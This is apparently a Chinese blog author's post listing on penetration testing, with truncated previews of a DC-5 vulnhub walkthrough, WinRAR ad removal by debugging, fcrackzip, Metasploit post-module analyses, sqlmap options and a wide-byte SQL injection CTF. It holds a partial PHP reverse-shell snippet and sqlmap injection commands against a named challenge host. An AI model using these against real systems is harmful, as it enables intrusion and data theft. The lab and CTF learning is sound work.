渗透测试
Cosmop01itan
这个作者很懒,什么都没留下…
展开
-
逆向去除winrar广告
推荐工具:x32dbg,spy4win,API Monitor环境:Xp 32,无ASLR用API Moniter监控gui,network相关的API,运行界面如下:弹一个广告窗口,还有个浏览器页面广告API Monitor监控到CreateWindowExW,可以在里面看到调用这个函数的地方,跟进到x32dbg。这里采取的策略是把创建窗口的参数及去掉visable属性,ebx里面的值是0,导致width,height,flag都是0。还是会访问服务器,做人留一线。去掉浏览器弹窗(随机弹出),原创 2021-08-05 23:22:11 · 371 阅读 · 0 评论 -
kali下fcrackzip使用
首先看一下helproot@kali:~# fcrackzip --helpfcrackzip version 1.0, a fast/free zip password crackerwritten by Marc Lehmann <pcg@goof.com> You can find more info onhttp://www.goof.com/pcg/marc/...原创 2019-07-02 12:53:52 · 3111 阅读 · 0 评论 -
DC-5 vulnhub靶机实战
首先是使用virtualbox安装,这里不推荐vmware,会出很多问题。nmap扫一下子网,看靶机的ip地址:发现ip是192.168.240.137,开放了80和111端口。给了提示是个文件包含漏洞,发现在thinkyou.php里面存在,验证一下。可以读到/etc/passwd文件。接下来就可以利用nginx的日志记录功能,将一句话写入到access.log里面,然后用tha...原创 2019-06-16 22:12:11 · 2530 阅读 · 0 评论 -
php reverseShell
<?php$sock = fsockopen($ip, $port);$descriptorspec = array( 0 => $sock, 1 => $sock, 2 => $sock);$process = proc_open('/bin/sh', $descriptorspec, $pipes);proc_c...转载 2019-06-12 20:01:24 · 596 阅读 · 0 评论 -
msf MessageBox后渗透模块编写
message_box.rb### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Post includ...原创 2019-03-08 12:39:57 · 698 阅读 · 0 评论 -
msf download_exec模块源码分析
https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/manage/download_exec.rb### This module requires Metasploit: https://metasploit.com/download# Current source: https://...原创 2019-03-08 09:57:21 · 878 阅读 · 0 评论 -
msf渗透脚本之交换鼠标左右功能
swap.rb### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Post include Msf::...原创 2019-03-07 15:27:41 · 1200 阅读 · 0 评论 -
msf killav.rb分析
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'set'class MetasploitModule < Msf::Post def i...原创 2019-03-10 12:52:49 · 579 阅读 · 0 评论 -
sqlmap参数说明
-u #注入点 -f #指纹判别数据库类型 -b #获取数据库版本信息 -p #指定可测试的参数(?page=1&id=2 -p “page,id”) -D “” #指定数据库名 -T “” #指定表名 -C “” #指定字段 -s “” #保存注入过程到一个文件,还可中断,下次恢复在注入(保存:-s “xx.log” 恢复:-s “xx.log” –resume) –c...转载 2018-08-28 19:42:23 · 1396 阅读 · 0 评论 -
南邮宽字节(sql_gbk)注入
首先题目过滤了单引号,先绕过,用%d6%27来绕过,构成一个宽字节,取消了单引号的转义,直接上sqlmap爆数据库:python sqlmap.py -u "http://chinalover.sinaapp.com/SQL-GBK/index.php?id=2%d6%27" --current-db爆表名:python sqlmap.py -u "http://chinalove...原创 2018-08-28 19:34:30 · 953 阅读 · 0 评论